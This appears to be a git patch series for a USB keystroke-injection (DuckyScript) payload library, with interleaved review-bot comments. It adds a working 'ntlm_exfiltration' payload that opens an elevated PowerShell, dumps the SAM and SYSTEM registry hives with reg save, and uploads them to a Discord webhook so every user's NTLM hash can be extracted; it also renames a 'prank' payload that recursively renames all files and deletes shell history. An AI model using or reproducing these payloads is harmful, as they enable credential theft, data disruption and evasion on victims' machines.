a/payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt +++ b/payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt 
@@ -73,7 +73,7 @@ DELAY 1000
 STRINGLN PowerShell
 DELAY 1000
-STRINGLN
+STRINGLN_POWERSHELL
 $path = Join-Path -Path $env:USERPROFILE -ChildPath "#SUBDIRECTORY"
 $folders = Get-ChildItem -Path $path -Directory | Where-Object { $_.Name -like "app-*" }
From 3cf199170c99cf690e7d65d92fea3cde280d96d7 Mon Sep 17 00:00:00 2001
From: Aleff
Date: Sat, 21 Sep 2024 09:41:51 +0200
Subject: [PATCH 11/15] Update payload
---
 .../README.md | 8 +++--
 .../payload.txt | 32 +++++++++++--------
 2 files changed, 23 insertions(+), 17 deletions(-)
 rename payloads/library/prank/{Rename_Everything_Similarly => Same_File_Name_Prank}/README.md (94%)
 rename payloads/library/prank/{Rename_Everything_Similarly => Same_File_Name_Prank}/payload.txt (89%)
diff --git a/payloads/library/prank/Rename_Everything_Similarly/README.md b/payloads/library/prank/Same_File_Name_Prank/README.md
similarity index 94%
rename from payloads/library/prank/Rename_Everything_Similarly/README.md
rename to payloads/library/prank/Same_File_Name_Prank/README.md
index 894892b..09a7944 100644
--- a/payloads/library/prank/Rename_Everything_Similarly/README.md
+++ b/payloads/library/prank/Same_File_Name_Prank/README.md
@@ -1,4 +1,4 @@
-# Rename Everything Similarly
+# Same File Name Prank
 This script, titled **Rename Everything Similarly**, is written in **DuckyScript 3.0** and designed to rename files and directories recursively on **Windows** or **GNU/Linux** systems, depending on the target environment. The script renames directories and files within a specified directory, giving them sequential and similar names.
@@ -50,9 +50,11 @@ For **GNU/Linux** systems, the script: ## How to Use 1. **Edit Definitions (*not mandatory, Windows by default*)**: Adjust the following definitions in the script according to your environment: - - `#TRUE_IF_THE_TARGET_IS_WINDOWS_ELSE_FALSE`: Leave `TRUE` for **Windows** targets and change to `FALSE` for **GNU/Linux** targets. + - `DEFINE #TARGET_WINDOWS TRUE`: Leave **#TARGET_WINDOWS** to **TRUE** if the script will run on a Windows system. + + - `DEFINE #TARGET_GNU_LINUX FALSE`: Set **TARGET_LINUX** to **TRUE** if the script will run on a GNU/Linux system. - Ufortunately it could not be published for macOS as well, [read more](#why-not-macos). + - Ufortunately it could not be published for macOS as well, [read more](#why-not-macos). - `#DIRECTORY_WHERE_TO_RUN_THE_COMMAND`: Specify the base directory where the renaming operation should occur, the default is `.` so the default route of Powershell and Bash. diff --git a/payloads/library/prank/Rename_Everything_Similarly/payload.txt b/payloads/library/prank/Same_File_Name_Prank/payload.txt similarity index 89% rename from payloads/library/prank/Rename_Everything_Similarly/payload.txt rename to payloads/library/prank/Same_File_Name_Prank/payload.txt index 5a2c70e..d5b6b7f 100644 --- a/payloads/library/prank/Rename_Everything_Similarly/payload.txt +++ b/payloads/library/prank/Same_File_Name_Prank/payload.txt 
@@ -1,13 +1,13 @@ REM_BLOCK -################################################# -# # -# Title : Rename Everything Similarly # -# Author : Aleff # -# Version : 1.0 # -# Category : Prank # -# Target : Windows 10/11; GNU/Linux # -# # -################################################# +############################################# +# # +# Title : Same File Name Prank # +# Author : Aleff # +# Version : 1.0 # +# Category : Prank # +# Target : Windows 10/11; GNU/Linux # +# # +############################################# END_REM REM I am very sorry not to be able to release scripts for macOS systems as well but unfortunately not having one would be too risky to test it in a VM, at least in my opinion, so if someone from the community wants to contribute they could propose a pull request with the macOS version so that we can integrate it and make this payload cross-platfom. @@ -31,12 +31,15 @@ REM_BLOCK END_REM DEFINE #DIRECTORY_WHERE_TO_RUN_THE_COMMAND . -REM leave it TRUE if you want to run this script into a target that use Windows as OS, else if you want to run this script into a GNU/Linux system you must change it to FALSE. -DEFINE #TRUE_IF_THE_TARGET_IS_WINDOWS_ELSE_FALSE TRUE +REM Set TARGET_WINDOWS to TRUE if the script will run on a Windows system. +REM Set TARGET_LINUX to TRUE if the script will run on a GNU/Linux system. +DEFINE #TARGET_WINDOWS TRUE +DEFINE #TARGET_GNU_LINUX FALSE REM %%%%% PAYLOAD-SECTION %%%%% -IF_DEFINED_TRUE #TRUE_IF_THE_TARGET_IS_WINDOWS_ELSE_FALSE +IF (( #TARGET_WINDOWS == TRUE) && (#TARGET_GNU_LINUX == FALSE)) THEN +REM %%%%% WINDOWS CODE %%%%% REM_BLOCK Credits: Hak5 LLC 
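Review bot: The new `IF (( #TARGET_WINDOWS == TRUE) && (#TARGET_GNU_LINUX == FALSE)) THEN` in the second hunk, paired with the mirrored `ELSE IF (( #TARGET_WINDOWS == FALSE) && (#TARGET_GNU_LINUX == TRUE)) THEN` and `END_IF` in the next two hunks (`@@ -132,7 +135,8 @@`, `@@ -215,4 +219,4 @@`), leaves two of the four flag combinations unhandled: with both defines TRUE or both FALSE neither branch matches and the payload silently does nothing, whereas the removed `IF_DEFINED_TRUE` / `ELSE_DEFINED` form always ran one of the two branches. Since the two flags are mutually exclusive by intent, a single flag covers every case: `IF (#TARGET_WINDOWS == TRUE) THEN` for the Windows branch and a plain `ELSE` for the GNU/Linux branch; if both defines are kept, the REM should at least say that a mismatched pair is a no-op. The new REM line also calls the variable `TARGET_LINUX` while the define is `#TARGET_GNU_LINUX`; `REM Set #TARGET_GNU_LINUX to TRUE if the script will run on a GNU/Linux system.` keeps them consistent (the README hunk above repeats the same mismatch).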
@@ -132,7 +135,8 @@ IF_DEFINED_TRUE #TRUE_IF_THE_TARGET_IS_WINDOWS_ELSE_FALSE $counter = 1; Rename-Directories -path $basePath -counter ([ref]$counter); $counter = 1; Rename-Files -path $basePath -counter ([ref]$counter); Remove-Item (Get-PSReadlineOption).HistorySavePath; exit END_STRINGLN -ELSE_DEFINED +ELSE IF (( #TARGET_WINDOWS == FALSE) && (#TARGET_GNU_LINUX == TRUE)) THEN +REM %%%%% GNU/LINUX CODE %%%%% REM_BLOCK Credits: Hak5 LLC @@ -215,4 +219,4 @@ ELSE_DEFINED counter=1; rename_directories "$base_path" $counter; counter=1; rename_files "$base_path" $counter; rm $HISTFILE; exit END_STRINGLN -END_IF_DEFINED +END_IF \ No newline at end of file From 15f8f25701bacc1816c1f942268517cf2d14f22b Mon Sep 17 00:00:00 2001 From: Luu <112649910+luu176@users.noreply.github.com> Date: Wed, 25 Sep 2024 00:18:39 +0200 Subject: [PATCH 12/15] Create payload.txt --- .../ntlm_exfiltration/payload.txt | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 payloads/library/exfiltration/ntlm_exfiltration/payload.txt diff --git a/payloads/library/exfiltration/ntlm_exfiltration/payload.txt b/payloads/library/exfiltration/ntlm_exfiltration/payload.txt new file mode 100644 index 0000000..ee2b9d6 --- /dev/null +++ b/payloads/library/exfiltration/ntlm_exfiltration/payload.txt 
@@ -0,0 +1,34 @@
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: luu176
+
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+END_EXTENSION
+
+DEFINE #DISCORD_WEBHOOK_URL DISCORD_WEBHOOK_URL_HERE
+GUI d
+DELAY 1000
+GUI r
+DELAY 1000
+STRINGLN powershell Start-Process powershell -Verb runAs
+DELAY 3000
+LEFTARROW
+ENTER
+DELAY 3000
+STRINGLN C:\Windows\System32\reg save HKLM\SAM sam /y; C:\Windows\System32\reg save HKLM\SYSTEM system /y; Add-Type -AssemblyName "System.Net.Http"; $webhookUrl = "#DISCORD_WEBHOOK_URL"; $client = New-Object System.Net.Http.HttpClient; $fileStream1 = [System.IO.File]::OpenRead("sam"); $fileContent1 = New-Object System.Net.Http.StreamContent($fileStream1); $content1 = New-Object System.Net.Http.MultipartFormDataContent; $content1.Add($fileContent1, "file", "sam"); $client.PostAsync($webhookUrl, $content1).Result; $fileStream1.Close(); $fileStream2 = [System.IO.File]::OpenRead("system"); $fileContent2 = New-Object System.Net.Http.StreamContent($fileStream2); $content2 = New-Object System.Net.Http.MultipartFormDataContent; $content2.Add($fileContent2, "file", "system"); $client.PostAsync($webhookUrl, $content2).Result; $fileStream2.Close()
+DELAY 500
+GUI d
From c898ed7858a76b584333672f2873b219d9f17a56 Mon Sep 17 00:00:00 2001 From: Luu <112649910+luu176@users.noreply.github.com> Date: Wed, 25 Sep 2024 00:20:06 +0200 Subject: [PATCH 13/15] Create README.md --- .../exfiltration/ntlm_exfiltration/README.md | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 payloads/library/exfiltration/ntlm_exfiltration/README.md
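Review bot: The new payload has no `REM_BLOCK` header (Title / Author / Version / Category / Target) of the kind the other payloads in this series carry (see the `Same_File_Name_Prank` header hunk), and its only attribution is the `REM AUTHOR:` line inside the detection extension, which the next commit changes again; a header along the lines of `Title : NTLM exfiltration`, `Category : Exfiltration`, `Target : Windows 10/11, elevated shell required` would bring it in line with the library. That header should also describe what the final `STRINGLN` line actually ships, copies of the SAM and SYSTEM registry hives produced by `reg save` rather than an NTLM hash as the README calls it, and that `reg save HKLM\SAM` only works from the elevated shell the `-Verb runAs` / UAC-prompt sequence obtains. From a defender's point of view, `reg.exe save HKLM\SAM` and `HKLM\SYSTEM` from an elevated PowerShell followed by an HTTP POST to a webhook is a well-known credential-access pattern, and naming it plainly in the payload metadata keeps the library's classification of this payload unambiguous.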
diff --git a/payloads/library/exfiltration/ntlm_exfiltration/README.md b/payloads/library/exfiltration/ntlm_exfiltration/README.md
new file mode 100644
index 0000000..acba0c3
--- /dev/null
+++ b/payloads/library/exfiltration/ntlm_exfiltration/README.md
@@ -0,0 +1,28 @@
+# Exfiltrate NTLM Hash - Windows ✅
+
+A script used to exfiltrate the NTLM hash on a Windows machine.
+
+## Description
+
+A script used to capture and exfiltrate the NTLM hash of a Windows machine. It utilizes PowerShell to retrieve the SAM and SYSTEM files, then sends them to a Discord webhook.
+
+### Settings
+
+* Set the Discord webhook URL
+* Ensure the webhook permissions are configured
+
+## Credits
+

Luu176

+
+ + + + +
+ + + +
Github +
+
From a81ecd3e6494b7a443e57bec4afa449bed7d8661 Mon Sep 17 00:00:00 2001 From: Luu <112649910+luu176@users.noreply.github.com> Date: Wed, 25 Sep 2024 00:21:49 +0200 Subject: [PATCH 14/15] Update payload.txt --- payloads/library/exfiltration/ntlm_exfiltration/payload.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/library/exfiltration/ntlm_exfiltration/payload.txt b/payloads/library/exfiltration/ntlm_exfiltration/payload.txt index ee2b9d6..7204ad5 100644 --- a/payloads/library/exfiltration/ntlm_exfiltration/payload.txt +++ b/payloads/library/exfiltration/ntlm_exfiltration/payload.txt @@ -1,6 +1,6 @@ EXTENSION PASSIVE_WINDOWS_DETECT REM VERSION 1.1 - REM AUTHOR: luu176 + REM AUTHOR: Korben DEFINE #MAX_WAIT 150 DEFINE #CHECK_INTERVAL 20 From 0df301160179eee71ee464e53a9f31e0584952eb Mon Sep 17 00:00:00 2001 From: Luu <112649910+luu176@users.noreply.github.com> Date: Wed, 25 Sep 2024 00:23:30 +0200 Subject: [PATCH 15/15] Update README.md --- payloads/library/exfiltration/ntlm_exfiltration/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/library/exfiltration/ntlm_exfiltration/README.md b/payloads/library/exfiltration/ntlm_exfiltration/README.md index acba0c3..4e31910 100644 --- a/payloads/library/exfiltration/ntlm_exfiltration/README.md +++ b/payloads/library/exfiltration/ntlm_exfiltration/README.md @@ -4,7 +4,7 @@ A script used to exfiltrate the NTLM hash on a Windows machine. ## Description -A script used to capture and exfiltrate the NTLM hash of a Windows machine. It utilizes PowerShell to retrieve the SAM and SYSTEM files, then sends them to a Discord webhook. +A script used to capture and exfiltrate the NTLM hash of a Windows machine. It utilizes PowerShell to retrieve the SAM and SYSTEM files, then sends them to a Discord webhook. These files can than be used to extract the NTLM hash of all users. ### Settings